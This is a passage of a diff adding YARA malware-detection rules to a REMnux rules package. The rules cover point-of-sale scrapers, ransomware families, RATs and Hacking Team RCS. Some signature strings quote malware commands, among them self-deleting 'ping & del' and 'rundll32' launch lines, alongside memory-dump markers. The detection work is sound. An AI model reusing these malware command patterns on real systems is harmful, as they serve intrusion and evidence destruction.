+rule winxml_dll
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Point of Sale (POS) Malware"
+    reference = "ce0296e2d77ec3bb112e270fc260f274"
+	version = "0.1"
+	description = "Testing the base64 encoded file in sys32"
+	date = "01/30/2014"
+strings:
+	$s1 = "\\system32\\winxml.dll"
+	//$s2 = "cmd /c net start %s"
+	//$s3 = "=== pid:"
+	//$s4 = "GOTIT"
+	//$s5 = ".memdump"
+	//$s6 = "POSWDS"
+condition:
+	uint16(0) == 0x5A4D and (all of ($s*))
+}
+
+rule pos_chewbacca
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Point of Sale (POS) Malware"
+    reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware"
+    hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54"
+	version = "0.2"
+	description = "Testing the base64 encoded file in sys32"
+	date = "01/30/2014"
+strings:
+	$s1 = "tor -f <torrc>"
+	$s2 = "tor_"
+	$s3 = "umemscan"
+	$s4 = "CHEWBAC"
+condition:
+	uint16(0) == 0x5A4D and (all of ($s*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/PubSab.yar remnux-rules-0.0.4/yara/malware/PubSab.yar
--- remnux-rules-0.0.3/yara/malware/PubSab.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/PubSab.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PubSabCode : PubSab Family 
+{
+    meta:
+        description = "PubSab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
+        
+    condition:
+        any of them
+}
+
+rule PubSabStrings : PubSab Family
+{
+    meta:
+        description = "PubSab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "_deamon_init"
+        $ = "com.apple.PubSabAgent"
+        $ = "/tmp/screen.jpeg"
+       
+    condition:
+        any of them
+}
+
+rule PubSab : Family
+{
+    meta:
+        description = "PubSab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        PubSabCode or PubSabStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/pyinstaller.yar remnux-rules-0.0.4/yara/malware/pyinstaller.yar
--- remnux-rules-0.0.3/yara/malware/pyinstaller.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/pyinstaller.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+import "pe"
+
+rule PE_File_pyinstaller
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+        description = "Detect PE file produced by pyinstaller"
+        reference = "https://isc.sans.edu/diary/21057"
+    strings:
+        $a = "pyi-windows-manifest-filename"
+    condition:
+        pe.number_of_resources > 0 and $a
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Quarian.yar remnux-rules-0.0.4/yara/malware/Quarian.yar
--- remnux-rules-0.0.3/yara/malware/Quarian.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Quarian.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,75 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule QuarianStrings : Quarian Family
+{
+    meta:
+        description = "Quarian Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "s061779s061750"
+        $ = "[OnUpLoadFile]"
+        $ = "[OnDownLoadFile]"
+        $ = "[FileTransfer]"
+        $ = "---- Not connect the Manager, so start UnInstall ----"
+        $ = "------- Enter CompressDownLoadDir ---------"
+        $ = "------- Enter DownLoadDirectory ---------"
+        $ = "[HandleAdditionalData]"
+        $ = "[mswsocket.dll]"
+        $ = "msupdate.dll........Enter ThreadCmd!"
+        $ = "ok1-1"
+        $ = "msupdate_tmp.dll"
+        $ = "replace Rpcss.dll successfully!"
+        $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
+        $ = "\\drivercashe\\" wide ascii
+        $ = "\\microsoft\\windwos\\" wide ascii
+        $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
+        $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
+        $ = "Global\\state_maping" wide ascii
+        $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
+        $ = "Global\\unInstall_event_1554_Ower" wide ascii
+        
+    condition:
+       any of them
+}
+
+rule QuarianCode : Quarian Family 
+{
+    meta:
+        description = "Quarian code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // decrypt in intelnat.sys
+        $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
+        // decrypt in mswsocket.dll
+        $ = { C1 EF 05 C1 E3 04 33 FB }
+        $ = { 33 D8 81 EE 47 86 C8 61 }
+        // loop in msupdate.dll
+        $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
+    
+    condition:
+        any of them
+}
+
+rule Quarian : Family
+{
+    meta:
+        description = "Quarian"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        QuarianCode or QuarianStrings
+}
+
+
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Ransom_DMALocker.yar remnux-rules-0.0.4/yara/malware/Ransom_DMALocker.yar
--- remnux-rules-0.0.3/yara/malware/Ransom_DMALocker.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ransom_DMALocker.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,37 @@
+//more info at reversecodes.wordpress.com
+rule DMALocker
+{
+    meta:
+    Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0"
+    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
+    Author = "SadFud"
+    Date = "30/05/2016"
+    
+    strings:
+    $uno = { 41 42 43 58 59 5a 31 31 }
+	  $dos = { 21 44 4d 41 4c 4f 43 4b }
+	  $tres = { 21 44 4d 41 4c 4f 43 4b 33 2e 30 }
+	  $cuatro = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 }
+    
+    condition:
+    any of them
+    
+}
+
+//More at reversecodes.wordpress.com
+rule DMALocker4 {
+
+    meta:
+    Description = "Deteccion del ransomware DMA Locker version 4.0"
+    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
+    Author = "SadFud"
+    Date = "30/05/2016"
+	Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1"
+    
+    strings:
+    $clave = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 }
+    
+    condition:
+    $clave 
+    
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Ransom_TeslaCrypt.yar remnux-rules-0.0.4/yara/malware/Ransom_TeslaCrypt.yar
--- remnux-rules-0.0.3/yara/malware/Ransom_TeslaCrypt.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ransom_TeslaCrypt.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule TeslaCrypt {
+meta:
+    description = "Regla para detectar Tesla con md5"
+    author = "CCN-CERT"
+    version = "1.0"
+strings:
+    $ = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 }
+condition:
+    all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Ransomware_Locky.yar remnux-rules-0.0.4/yara/malware/Ransomware_Locky.yar
--- remnux-rules-0.0.3/yara/malware/Ransomware_Locky.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ransomware_Locky.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-02-17
+	Identifier: Locky
+*/
+
+rule Locky_Ransomware {
+	meta:
+		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
+		author = "Florian Roth (with the help of binar.ly)"
+		reference = "https://goo.gl/qScSrE"
+		date = "2016-02-17"
+		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
+	strings:
+		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } // address=0x4144a7
+		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } // address=0x413863
+	condition:
+		all of ($o*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Ransomware_Petya.yar remnux-rules-0.0.4/yara/malware/Ransomware_Petya.yar
--- remnux-rules-0.0.3/yara/malware/Ransomware_Petya.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ransomware_Petya.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-03-24
+	Identifier: Petya Ransomware
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Petya_Ransomware {
+	meta:
+		description = "Detects Petya Ransomware"
+		author = "Florian Roth"
+		reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html"
+		date = "2016-03-24"
+		hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739"
+	strings:
+		$a1 = "<description>WinRAR SFX module</description>" fullword ascii
+
+		$s1 = "BX-Proxy-Manual-Auth" fullword wide
+		$s2 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
+		$s3 = "X-HTTP-Attempts" fullword wide
+		$s4 = "@CommandLineMode" fullword wide
+		$s5 = "X-Retry-After" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and $a1 and 3 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Ransomware.yar remnux-rules-0.0.4/yara/malware/Ransomware.yar
--- remnux-rules-0.0.3/yara/malware/Ransomware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ransomware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,99 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CryptoLocker_set1
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-13"
+	description = "Detection of Cryptolocker Samples"
+	
+strings:
+	$string0 = "static"
+	$string1 = " kscdS"
+	$string2 = "Romantic"
+	$string3 = "CompanyName" wide
+	$string4 = "ProductVersion" wide
+	$string5 = "9%9R9f9q9"
+	$string6 = "IDR_VERSION1" wide
+	$string7 = "  </trustInfo>"
+	$string8 = "LookFor" wide
+	$string9 = ":n;t;y;"
+	$string10 = "        <requestedExecutionLevel level"
+	$string11 = "VS_VERSION_INFO" wide
+	$string12 = "2.0.1.0" wide
+	$string13 = "<assembly xmlns"
+	$string14 = "  <trustInfo xmlns"
+	$string15 = "srtWd@@"
+	$string16 = "515]5z5"
+	$string17 = "C:\\lZbvnoVe.exe" wide
+condition:
+	12 of ($string*)
+}
+
+rule CryptoLocker_rule2
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-14"
+	description = "Detection of CryptoLocker Variants"
+strings:
+	$string0 = "2.0.1.7" wide
+	$string1 = "    <security>"
+	$string2 = "Romantic"
+	$string3 = "ProductVersion" wide
+	$string4 = "9%9R9f9q9"
+	$string5 = "IDR_VERSION1" wide
+	$string6 = "button"
+	$string7 = "    </security>"
+	$string8 = "VFileInfo" wide
+	$string9 = "LookFor" wide
+	$string10 = "      </requestedPrivileges>"
+	$string11 = " uiAccess"
+	$string12 = "  <trustInfo xmlns"
+	$string13 = "last.inf"
+	$string14 = " manifestVersion"
+	$string15 = "FFFF04E3" wide
+	$string16 = "3,31363H3P3m3u3z3"
+condition:
+	12 of ($string*)
+}
+
+rule SVG_LoadURL {
+	meta:
+		description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
+		author = "Florian Roth"
+		reference = "http://goo.gl/psjCCc"
+		date = "2015-05-24"
+		hash1 = "ac8ef9df208f624be9c7e7804de55318"
+		hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
+		hash3 = "7e2be5cc785ef7711282cea8980b9fee"
+		hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
+		score = 50
+	strings:
+		$s1 = "</svg>" nocase
+		$s2 = "<script>" nocase
+		$s3 = "location.href='http" nocase
+	condition:
+		all of ($s*) and filesize < 600
+}
+rule BackdoorFCKG: CTB_Locker_Ransomware
+{
+meta:
+author = "ISG"
+date = "2015-01-20"
+reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
+description = "CTB_Locker"
+
+strings:
+$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
+$string2 = "keme132.DLL" 
+$string3 = "klospad.pdb" 
+condition:
+3 of them 
+}
diff -Nru remnux-rules-0.0.3/yara/malware/RAT_Sakula.yar remnux-rules-0.0.4/yara/malware/RAT_Sakula.yar
--- remnux-rules-0.0.3/yara/malware/RAT_Sakula.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/RAT_Sakula.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,95 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule sakula_v1_0
+{
+    meta:
+        description = "Sakula v1.0"
+        date = "2015-10-13"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
+    strings:
+        $m1 = "%d_of_%d_for_%s_on_%s"
+        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
+        $m3 = "=%s&type=%d"
+        $m4 = "?photoid="
+        $m5 = "iexplorer"
+                $m6 = "net start \"%s\""
+        $v1_1 = "MicroPlayerUpdate.exe"
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and all of ($m*) and not $v1_1
+}
+
+rule sakula_v1_1
+{
+    meta:
+        description = "Sakula v1.1"
+        date = "2015-10-13"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
+    strings:
+        $m1 = "%d_of_%d_for_%s_on_%s"
+        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
+        $m3 = "=%s&type=%d"
+        $m4 = "?photoid="
+        $m5 = "iexplorer"
+                $m6 = "net start \"%s\""
+        $v1_1 = "MicroPlayerUpdate.exe"
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and all of them
+}
+
+rule sakula_v1_2
+{
+    meta:
+        description = "Sakula v1.2"
+        date = "2015-10-13"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
+    strings:
+        $m1 = "%d_of_%d_for_%s_on_%s"
+        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
+        $m3 = "cmd.exe /c rundll32 \"%s\""
+        $v1_1 = "MicroPlayerUpdate.exe"
+        $v1_2 = "CCPUpdate"
+
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1
+}
+
+rule sakula_v1_3
+{
+    meta:
+        description = "Sakula v1.3"
+        date = "2015-10-13"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
+    strings:
+        $m1 = "%d_of_%d_for_%s_on_%s"
+        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
+        $m3 = "cmd.exe /c rundll32 \"%s\""
+
+        $v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }
+
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and all of them
+}
+
+rule sakula_v1_4
+{
+    meta:
+        description = "Sakula v1.4"
+        date = "2015-10-13"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
+    strings:
+        $m1 = "%d_of_%d_for_%s_on_%s"
+        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
+        $m3 = "cmd.exe /c rundll32 \"%s\""
+
+        $v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }
+
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/RAT_Terminator.yar remnux-rules-0.0.4/yara/malware/RAT_Terminator.yar
--- remnux-rules-0.0.3/yara/malware/RAT_Terminator.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/RAT_Terminator.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule TerminatorRat : rat 
+{
+	meta:
+		description = "Terminator RAT" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-24"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html" 
+
+	strings:
+		$a = "Accelorator"
+		$b = "<html><title>12356</title><body>"
+
+	condition:
+		all of them
+}
+
+
+
+rule TROJAN_Notepad_shell_crew {
+        meta:
+                author = "RSA_IR"
+                Date     = "4Jun13"
+                File     = "notepad.exe v 1.1"
+                MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+        strings:
+                $s1 = "75BAA77C842BE168B0F66C42C7885997"
+                $s2 = "B523F63566F407F3834BCC54AAA32524"
+        condition:
+                $s1 or $s2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/RCS.yar remnux-rules-0.0.4/yara/malware/RCS.yar
--- remnux-rules-0.0.3/yara/malware/RCS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/RCS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,73 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RCS_Backdoor
+{
+    meta:
+        description = "Hacking Team RCS Backdoor"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$debug3"
+        $filter2 = "$log2"
+        $filter3 = "error2"
+
+        $debug1 = /\- (C)hecking components/ wide ascii
+        $debug2 = /\- (A)ctivating hiding system/ wide ascii
+        $debug3 = /(f)ully operational/ wide ascii
+
+        $log1 = /\- Browser activity \(FF\)/ wide ascii
+        $log2 = /\- Browser activity \(IE\)/ wide ascii
+        
+        // Cause false positives.
+        //$log3 = /\- About to call init routine at %p/ wide ascii
+        //$log4 = /\- Calling init routine at %p/ wide ascii
+
+        $error1 = /\[Unable to deploy\]/ wide ascii
+        $error2 = /\[The system is already monitored\]/ wide ascii
+
+    condition:
+        (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
+}
+
+rule RCS_Scout
+{
+    meta:
+        description = "Hacking Team RCS Scout"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$engine5"
+        $filter2 = "$start4"
+        $filter3 = "$upd2"
+        $filter4 = "$lookma6"
+
+        $engine1 = /(E)ngine started/ wide ascii
+        $engine2 = /(R)unning in background/ wide ascii
+        $engine3 = /(L)ocking doors/ wide ascii
+        $engine4 = /(R)otors engaged/ wide ascii
+        $engine5 = /(I)\'m going to start it/ wide ascii
+
+        $start1 = /Starting upgrade\!/ wide ascii
+        $start2 = /(I)\'m going to start the program/ wide ascii
+        $start3 = /(i)s it ok\?/ wide ascii
+        $start4 = /(C)lick to start the program/ wide ascii
+
+        $upd1 = /(U)pdJob/ wide ascii
+        $upd2 = /(U)pdTimer/ wide ascii
+
+        $lookma1 = /(O)wning PCI bus/ wide
+        $lookma2 = /(F)ormatting bios/ wide
+        $lookma3 = /(P)lease insert a disk in drive A:/ wide
+        $lookma4 = /(U)pdating CPU microcode/ wide
+        $lookma5 = /(N)ot sure what's happening/ wide
+        $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide        
+
+    condition:
+        (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Regsubdat.yar remnux-rules-0.0.4/yara/malware/Regsubdat.yar
--- remnux-rules-0.0.3/yara/malware/Regsubdat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Regsubdat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RegSubDatCode : RegSubDat Family 
+{
+    meta:
+        description = "RegSubDat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop
+        $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
+        // push then pop values
+        $ = { 68 FF FF 7F 00 5? }
+        $ = { 68 FF 7F 00 00 5? }
+    
+    condition:
+        all of them
+}
+
+rule RegSubDatStrings : RegSubDat Family
+{
+    meta:
+        description = "RegSubDat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $avg1 = "Button"
+        $avg2 = "Allow"
+        $avg3 = "Identity Protection"
+        $avg4 = "Allow for all"
+        $avg5 = "AVG Firewall Asks For Confirmation"
+        $mutex = "0x1A7B4C9F"
+        
+    condition:
+       all of ($avg*) or $mutex
+}
+
+rule RegSubDat : Family
+{
+    meta:
+        description = "RegSubDat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        RegSubDatCode or RegSubDatStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Retefe.yar remnux-rules-0.0.4/yara/malware/Retefe.yar
--- remnux-rules-0.0.3/yara/malware/Retefe.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Retefe.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+  rule Retefe
+{
+meta:
+	author = "bartblaze"
+	description = "Retefe"
+strings:
+	$string0 = "01050000"
+	$string1 = "00000000"
+	$string2 = "5061636b61676500"
+	$string3 = "000000000000000000000000000000000000000000000000000000000000000000000000000000"
+	$string4 = "{\\stylesheet{ Normal;}{\\s1 heading 1;}{\\s2 heading 2;}}"
+	$string5 = "02000000"
+condition:
+	5 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Rockloader.yar remnux-rules-0.0.4/yara/malware/Rockloader.yar
--- remnux-rules-0.0.3/yara/malware/Rockloader.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Rockloader.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,38 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+  Description: Rar file with a .js inside
+  Author: iHeartMalware
+  Priority: 5
+  Scope: Against Attachment
+  Tags: http://phishme.com/rockloader-new-upatre-like-downloader-pushed-dridex-downloads-malwares/
+  Created in PhishMe Triage on April 7, 2016 3:41 PM
+*/
+
+rule rar_with_js
+{
+  strings:
+  $h1 = "Rar!" 
+  $s1 = ".js" nocase
+    
+  condition:
+    $h1 at 0 and $s1
+}
+
+
+
+rule RockLoader{
+meta:
+name = "RockLoader"
+description = "RockLoader Malware"
+author = "@seanmw"
+strings:
+$hdr = {4d 5a 90 00}
+$op1 = {39 45 f0 0f 8e b0 00 00 00}
+$op2 = {32 03 77 73 70 72 69 6e 74 66 41 00 ce 02 53 65}
+condition:
+$hdr at 0 and all of ($op*) and filesize < 500KB
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Rooter.yar remnux-rules-0.0.4/yara/malware/Rooter.yar
--- remnux-rules-0.0.3/yara/malware/Rooter.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Rooter.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,95 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RooterCode : Rooter Family 
+{
+    meta:
+        description = "Rooter code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // xor 0x30 decryption
+        $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }
+    
+    condition:
+        any of them
+}
+
+rule RooterStrings : Rooter Family
+{
+    meta:
+        description = "Rooter Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $group1 = "seed\x00"
+        $group2 = "prot\x00"
+        $group3 = "ownin\x00"
+        $group4 = "feed0\x00"
+        $group5 = "nown\x00"
+
+    condition:
+       3 of ($group*)
+}
+
+
+rule Rooter : Family
+{
+    meta:
+        description = "Rooter"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        RooterCode or RooterStrings
+}
+
+rule RookieStrings : Rookie Family
+{
+    meta:
+        description = "Rookie Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "RookIE/1.0"
+        
+    condition:
+       any of them
+}
+
+rule RookieCode : Rookie Family 
+{
+    meta:
+        description = "Rookie code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        // hidden AutoConfigURL
+        $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }
+        // hidden ProxyEnable
+        $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }
+        // xor on rand value?
+        $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }
+
+    condition:
+        any of them
+}
+
+rule Rookie : Family
+{
+    meta:
+        description = "Rookie"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        RookieCode or RookieStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/rovnix_downloader_sinkhole_check.yar remnux-rules-0.0.4/yara/malware/rovnix_downloader_sinkhole_check.yar
--- remnux-rules-0.0.3/yara/malware/rovnix_downloader_sinkhole_check.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/rovnix_downloader_sinkhole_check.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+rule rovnix_downloader
+{
+	meta:
+		author="Intel Security"
+		description="Rovnix downloader with sinkhole checks"
+		reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
+	strings:
+			$sink1= "control"
+			$sink2 = "sink"
+			$sink3 = "hole"
+			$sink4= "dynadot"
+			$sink5= "block"
+			$sink6= "malw"
+			$sink7= "anti"
+			$sink8= "googl"
+			$sink9= "hack"
+			$sink10= "trojan"
+			$sink11= "abuse"
+			$sink12= "virus"
+			$sink13= "black"
+			$sink14= "spam"
